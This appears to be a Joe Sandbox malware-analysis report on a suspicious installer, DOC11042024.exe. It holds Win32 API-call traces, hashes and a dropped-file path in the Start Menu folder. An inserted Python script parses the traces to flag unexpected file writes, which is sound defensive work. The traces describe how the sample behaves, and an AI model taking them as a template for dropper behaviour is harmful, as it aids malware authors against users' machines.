                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00425970,00000000,-0000000A,00409544,00000000,[Rename]), ref: 00405D10
                                                                              • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00405D22
                                                                              • GlobalFree.KERNEL32(00000000), ref: 00405D29
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00405D30
                                                                                • Part of subcall function 00405B2B: GetFileAttributesW.KERNELBASE(00000003,00402D95,00437800,80000000,00000003), ref: 00405B2F
                                                                                • Part of subcall function 00405B2B: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B51
                                                                              Similarity
                                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                              • String ID: %ls=%ls$NUL$[Rename]$p]B$peB
                                                                              • API String ID: 3756836283-3322868524
                                                                              • Opcode ID: 1fb84e7b3f3acc2a231e8d2fa99d458ab44c7ba5484f827976de58849258f507
                                                                              • Instruction ID: 3c0764388f4170debf6dbfee7e8ed18641309b00d4ae587825bdd244f77ffd11
                                                                              • Opcode Fuzzy Hash: 1fb84e7b3f3acc2a231e8d2fa99d458ab44c7ba5484f827976de58849258f507
                                                                              • Instruction Fuzzy Hash: 5541F571608B19BFE2206B619C49F6B3A6CEF45754F14453BF902B62D2D638EC018E7D
                                                                              APIs
                                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                              • DrawTextW.USER32(00000000,004281E0,000000FF,00000010,00000820), ref: 00401156
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                              Similarity
                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                              • String ID: F
                                                                              • API String ID: 941294808-1304234792
                                                                              • Opcode ID: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                                                                              • Instruction ID: 126a239e0572de30fb8c34ac70cebce50066b6690b2383a097db7944ba687981
                                                                              • Opcode Fuzzy Hash: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                                                                              • Instruction Fuzzy Hash: DA419A71804249AFCB058FA5DD459BFBFB9FF48310F00802AF951AA1A0C738EA51DFA5
                                                                              APIs
                                                                              • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\DOC11042024.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004032F4,C:\Users\user\AppData\Local\Temp\,75923420,004034D4), ref: 00406199
                                                                              • CharNextW.USER32(?,?,?,00000000), ref: 004061A8
                                                                              • CharNextW.USER32(?,"C:\Users\user\Desktop\DOC11042024.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004032F4,C:\Users\user\AppData\Local\Temp\,75923420,004034D4), ref: 004061AD
                                                                              • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004032F4,C:\Users\user\AppData\Local\Temp\,75923420,004034D4), ref: 004061C0
                                                                              Similarity
                                                                              • API ID: Char$Next$Prev
                                                                              • String ID: "C:\Users\user\Desktop\DOC11042024.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                              • API String ID: 589700163-967661352
                                                                              • Opcode ID: 7531bfc45c3a0d9c0e360a12fd5bcb7b3753da0bcb1adc44cb2e17581a244e6d
                                                                              • Instruction ID: 0cfc1b77ea1f4d614fc6d1e8c14bbd51de93f2eb6618689411aad4dba739ceca
                                                                              • Opcode Fuzzy Hash: 7531bfc45c3a0d9c0e360a12fd5bcb7b3753da0bcb1adc44cb2e17581a244e6d
                                                                              • Instruction Fuzzy Hash: 3811C87A80421199DB313B148C40AB7A6A8EF557A0F56403FED86773C2E77C5C9286AD
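Each function record on this page lists the Win32 calls the Joe Sandbox IDA plugin recovered, with the stack contents at the call site printed as the argument list. That list is longer than the API's real parameter count (DeleteFileW takes one parameter but five values are shown), so values past the true arity belong to the caller's frame, and matching paths in them is a hint rather than proof. As an added example that is not part of the report, the Python below parses such lines into records and flags file-operation calls whose path lies outside the sample's own Temp and Desktop directories; run on the quoted lines it singles out the WriteFile whose stack holds C:\ProgramData\Microsoft\Windows\Start Menu\ciliella.Kon. The sample lines are quoted from this report's listings; the FILE_APIS set and the EXPECTED_PREFIXES allow-list are my assumptions.

```python
"""Parse Joe Sandbox IDA-plugin API listings ("• Api.MODULE(args), ref: ADDR" lines)
into records and flag file operations on paths outside the directories the sample is
expected to use.  Added example, not code from the report."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# One call line.  Accepts the optional "Part of subcall function X:" prefix and the
# argument-less form "• wsprintfA.USER32 ref: 00405C26" that appears in the listing.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# An absolute Windows path, optionally wrapped in double quotes.
WIN_PATH = re.compile(r'^"?([A-Za-z]:\\[^"]*)"?$')

# APIs that create, write, delete or launch a file.  Assumed short list, not the
# plugin's own classification.
FILE_APIS = {"CreateFileW", "WriteFile", "DeleteFileW", "MoveFileW", "CopyFileW",
             "ShellExecuteW"}
# Where this sample legitimately works (the report's profile is C:\Users\user).
EXPECTED_PREFIXES = ("c:\\users\\user\\appdata\\local\\temp\\",
                     "c:\\users\\user\\desktop\\")


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]      # stack values as printed; "?" means unknown
    ref: int             # address of the call instruction
    subcall_of: Optional[int] = None


def split_args(raw: str) -> List[str]:
    """Split on commas that are not inside double quotes."""
    out, cur, quoted = [], [], False
    for ch in raw:
        if ch == '"':
            quoted = not quoted
        if ch == "," and not quoted:
            out.append("".join(cur))
            cur = []
        else:
            cur.append(ch)
    if cur or out:
        out.append("".join(cur))
    return out


def parse_line(line: str) -> Optional[ApiCall]:
    m = API_LINE.match(line)
    if not m:
        return None
    args = split_args(m["args"]) if m["args"] is not None else []
    sub = int(m["sub"], 16) if m["sub"] else None
    return ApiCall(m["api"], m["mod"], args, int(m["ref"], 16), sub)


def parse_listing(text: str) -> List[ApiCall]:
    return [c for c in (parse_line(ln) for ln in text.splitlines()) if c]


def path_args(call: ApiCall) -> List[str]:
    """Path-looking stack values, quotes stripped.  The plugin prints more stack
    slots than the API has parameters, so these are hints, not verified arguments."""
    hits = []
    for a in call.args:
        m = WIN_PATH.match(a.strip())
        if m:
            hits.append(m.group(1))
    return hits


def unexpected_file_ops(calls: List[ApiCall]) -> List[Tuple[str, str, int]]:
    """(api, path, ref) for file APIs whose path is outside EXPECTED_PREFIXES."""
    flagged = []
    for c in calls:
        if c.api not in FILE_APIS:
            continue
        for p in path_args(c):
            if not p.lower().startswith(EXPECTED_PREFIXES):
                flagged.append((c.api, p, c.ref))
    return flagged


# Lines quoted from this report's listings.
SAMPLE = r"""
• DeleteFileW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\DOC11042024.exe"), ref: 0040575A
• FindFirstFileW.KERNEL32(004246D8,?,?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\DOC11042024.exe"), ref: 004057DB
• ShellExecuteW.SHELL32(0000070B,open,00427180,00000000,00000000,00000001), ref: 004044A5
• wsprintfA.USER32 ref: 00405C26
  • Part of subcall function 00405B2B: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B51
• WriteFile.KERNEL32(00000000,?,C:\ProgramData\Microsoft\Windows\Start Menu\ciliella.Kon,00000000,?,?,00000000,00000011), ref: 00402566
"""

if __name__ == "__main__":
    calls = parse_listing(SAMPLE)
    for c in calls:
        print(f"{c.ref:08X} {c.api}.{c.module:<10} paths={path_args(c)}")
    for api, path, ref in unexpected_file_ops(calls):
        print(f"FLAG {ref:08X} {api} -> {path}")
```

The parser can be pointed at a whole saved report rather than the six quoted lines; when triaging a different sample, replace EXPECTED_PREFIXES with that process's working directories and widen FILE_APIS as needed. Because the flagged path comes from a stack slot and not from a verified parameter, confirm it against the function's disassembly (ref 00402566 here) before treating it as a dropped-file indicator.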
APIs
• WideCharToMultiByte.KERNEL32(?,?,anagallis\salpetersyrlingens\Derrieres,000000FF,C:\ProgramData\Microsoft\Windows\Start Menu\ciliella.Kon,00000400,?,?,00000021), ref: 0040252D
• lstrlenA.KERNEL32(C:\ProgramData\Microsoft\Windows\Start Menu\ciliella.Kon,?,?,anagallis\salpetersyrlingens\Derrieres,000000FF,C:\ProgramData\Microsoft\Windows\Start Menu\ciliella.Kon,00000400,?,?,00000021), ref: 00402534
• WriteFile.KERNEL32(00000000,?,C:\ProgramData\Microsoft\Windows\Start Menu\ciliella.Kon,00000000,?,?,00000000,00000011), ref: 00402566
Memory Dump Source
• Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
Similarity
• API ID: ByteCharFileMultiWideWritelstrlen
• String ID: 8$C:\ProgramData\Microsoft\Windows\Start Menu\ciliella.Kon$anagallis\salpetersyrlingens\Derrieres
• API String ID: 1453599865-2990829865
APIs
• GetWindowLongW.USER32(?,000000EB), ref: 00404175
• GetSysColor.USER32(00000000), ref: 00404191
• SetTextColor.GDI32(?,00000000), ref: 0040419D
• SetBkMode.GDI32(?,?), ref: 004041A9
• GetSysColor.USER32(?), ref: 004041BC
• SetBkColor.GDI32(?,?), ref: 004041CC
• DeleteObject.GDI32(?), ref: 004041E6
• CreateBrushIndirect.GDI32(?), ref: 004041F0
Memory Dump Source
• Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
Similarity
• API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
• String ID:
• API String ID: 2320649405-0
APIs
• GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 0040279F
• GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 004027BB
• GlobalFree.KERNEL32(FFFFFD66), ref: 004027F4
• WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402806
• GlobalFree.KERNEL32(00000000), ref: 0040280D
• CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402825
• DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402839
Memory Dump Source
• Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
Similarity
• API ID: Global$AllocFileFree$CloseDeleteHandleWrite
• String ID:
• API String ID: 3294113728-0
APIs
• DestroyWindow.USER32(00000000,00000000), ref: 00402CCB
• GetTickCount.KERNEL32 ref: 00402CE9
• wsprintfW.USER32 ref: 00402D17
  • Part of subcall function 00405156: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D2A,00000000,?), ref: 0040518E
  • Part of subcall function 00405156: lstrlenW.KERNEL32(00402D2A,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D2A,00000000), ref: 0040519E
  • Part of subcall function 00405156: lstrcatW.KERNEL32(Completed,00402D2A,00402D2A,Completed,00000000,00000000,00000000), ref: 004051B1
  • Part of subcall function 00405156: SetWindowTextW.USER32(Completed,Completed), ref: 004051C3
  • Part of subcall function 00405156: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004051E9
  • Part of subcall function 00405156: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405203
  • Part of subcall function 00405156: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405211
• CreateDialogParamW.USER32(0000006F,00000000,00402C15,00000000), ref: 00402D3B
• ShowWindow.USER32(00000000,00000005), ref: 00402D49
  • Part of subcall function 00402C94: MulDiv.KERNEL32(0002449B,00000064,00029BE6), ref: 00402CA9
Memory Dump Source
• Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
Similarity
• API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
• String ID: ... %d%%
• API String ID: 722711167-2449383134
APIs
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A3B
• GetMessagePos.USER32 ref: 00404A43
• ScreenToClient.USER32(?,?), ref: 00404A5D
• SendMessageW.USER32(?,00001111,00000000,?), ref: 00404A6F
• SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404A95
Memory Dump Source
• Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
Similarity
• API ID: Message$Send$ClientScreen
• String ID: f
• API String ID: 41195575-1993550816
APIs
• GetDC.USER32(?), ref: 00401D44
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
• MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
• ReleaseDC.USER32(?,00000000), ref: 00401D71
• CreateFontIndirectW.GDI32(0040BD88), ref: 00401DBC
Memory Dump Source
• Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
Similarity
• API ID: CapsCreateDeviceFontIndirectRelease
• String ID: Times New Roman
• API String ID: 3808545654-927190056
APIs
• SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C33
• wsprintfW.USER32 ref: 00402C67
• SetWindowTextW.USER32(?,?), ref: 00402C77
• SetDlgItemTextW.USER32(?,00000406,?), ref: 00402C89
Memory Dump Source
• Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                              • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                              • API String ID: 1451636040-1158693248
                                                                              • Opcode ID: 554fe6f9690c61400e4eda3edd1f4922ff9d37f4658182a2613de7d634146abe
                                                                              • Instruction ID: 48e59a72eb1afd3ccce1f90cad832feacbd2ac136dd55b0bdfc26f3f1c991dc6
                                                                              • Opcode Fuzzy Hash: 554fe6f9690c61400e4eda3edd1f4922ff9d37f4658182a2613de7d634146abe
                                                                              • Instruction Fuzzy Hash: F3F01270504109ABEF245F61DD49BAE3768AB00705F00843AFA15B51D0DBF99959CB99
                                                                              APIs
                                                                              • ReadFile.KERNEL32(?,?,00000001,?), ref: 004025CA
                                                                              • MultiByteToWideChar.KERNEL32(?,?,?,00000001,?,00000001), ref: 004025EC
                                                                              • ReadFile.KERNEL32(?,?,00000002,?), ref: 00402607
                                                                                • Part of subcall function 00405DE9: wsprintfW.USER32 ref: 00405DF6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: FileRead$ByteCharMultiWidewsprintf
                                                                              • String ID: 9
                                                                              • API String ID: 3029736425-2366072709
                                                                              • Opcode ID: 0efa4354ff525d3079d6140453000556cb67621d6b508409ec9325c9c89c508a
                                                                              • Instruction ID: c4cd8ab1bbc4a9069a9adb6c21cf72f9a5641064d0b2c960c84d733a5925a05a
                                                                              • Opcode Fuzzy Hash: 0efa4354ff525d3079d6140453000556cb67621d6b508409ec9325c9c89c508a
                                                                              • Instruction Fuzzy Hash: 9C316170D0021AEADF20DF94DA88EBEB7B9FB10344F50447BE401B62D4D7B98A81CB59
                                                                              APIs
                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B31
                                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402B6D
                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402B76
                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402B9B
                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402BB9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: Close$DeleteEnumOpen
                                                                              • String ID:
                                                                              • API String ID: 1912718029-0
                                                                              • Opcode ID: de1bec0198d5711d10fd85a40ffd3bd8e417e8644db3b6ce8e857f146d36a2dd
                                                                              • Instruction ID: cc4ad6e4774ad99ebc46e9603e3f84a1c50872ccdb4a22261381f2b766b1f9f0
                                                                              • Opcode Fuzzy Hash: de1bec0198d5711d10fd85a40ffd3bd8e417e8644db3b6ce8e857f146d36a2dd
                                                                              • Instruction Fuzzy Hash: A4114F7150010CFFDF119F90DE89DAA3B79EB04348F10047AFA05B11A0D3B9AE51EB69
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                                              • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                                              • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                                              • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                                              • DeleteObject.GDI32(00000000), ref: 00401D36
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                              • String ID:
                                                                              • API String ID: 1849352358-0
                                                                              • Opcode ID: a9f1956136b06e0d21c0be8457cce007b75485a25b1ad61ec76ed5e47bc5ce2b
                                                                              • Instruction ID: 9f239c48d4aaa00782f217baa2b30d914516c3821aac0afcf03912814d809b9c
                                                                              • Opcode Fuzzy Hash: a9f1956136b06e0d21c0be8457cce007b75485a25b1ad61ec76ed5e47bc5ce2b
                                                                              • Instruction Fuzzy Hash: FAF0E1B2A04105BFD701DBA4EE88DDE7BBCEB08341F100466F602F11A0C674AD418B39
                                                                              APIs
                                                                              • lstrlenW.KERNEL32(004226D0,004226D0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 004049CB
                                                                              • wsprintfW.USER32 ref: 004049D4
                                                                              • SetDlgItemTextW.USER32(?,004226D0), ref: 004049E7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                              • String ID: %u.%u%s%s
                                                                              • API String ID: 3540041739-3551169577
                                                                              • Opcode ID: 2e4606acc9f48e4f9a88fe8c78b0c6640a39c8006bdf8dd1d9d6c2f7b0a7ada7
                                                                              • Instruction ID: 90bc30eb4fb9e50e243b5350af64a2c38dc69b27024c9e4725b9460d43b6fd17
                                                                              • Opcode Fuzzy Hash: 2e4606acc9f48e4f9a88fe8c78b0c6640a39c8006bdf8dd1d9d6c2f7b0a7ada7
                                                                              • Instruction Fuzzy Hash: 431126736001243BCB10666D9C45E9F365D9BC2335F140637FA69F61D0D9388D1286E8
                                                                              APIs
                                                                              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403306,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004034D4), ref: 00405910
                                                                              • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403306,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004034D4), ref: 0040591A
                                                                              • lstrcatW.KERNEL32(?,00409014), ref: 0040592C
                                                                              Strings
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 0040590A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: CharPrevlstrcatlstrlen
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                              • API String ID: 2659869361-823278215
                                                                              • Opcode ID: 1447656032315978b1f69cf749e7b3958b60c33623e7124d34fd1eba4ba6eb1c
                                                                              • Instruction ID: 42ff842ad4801a4078384bf2e5d5b139b5e6e65dd3ea51437ef0ee7d13eb97eb
                                                                              • Opcode Fuzzy Hash: 1447656032315978b1f69cf749e7b3958b60c33623e7124d34fd1eba4ba6eb1c
                                                                              • Instruction Fuzzy Hash: AED0A731106930AAD2227744CC00DDF729CEE45301340043BF140B31B5C7781E418BFD
                                                                              APIs
                                                                              • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                                              • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                                                              • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                                              • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                                                • Part of subcall function 00405DE9: wsprintfW.USER32 ref: 00405DF6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmp
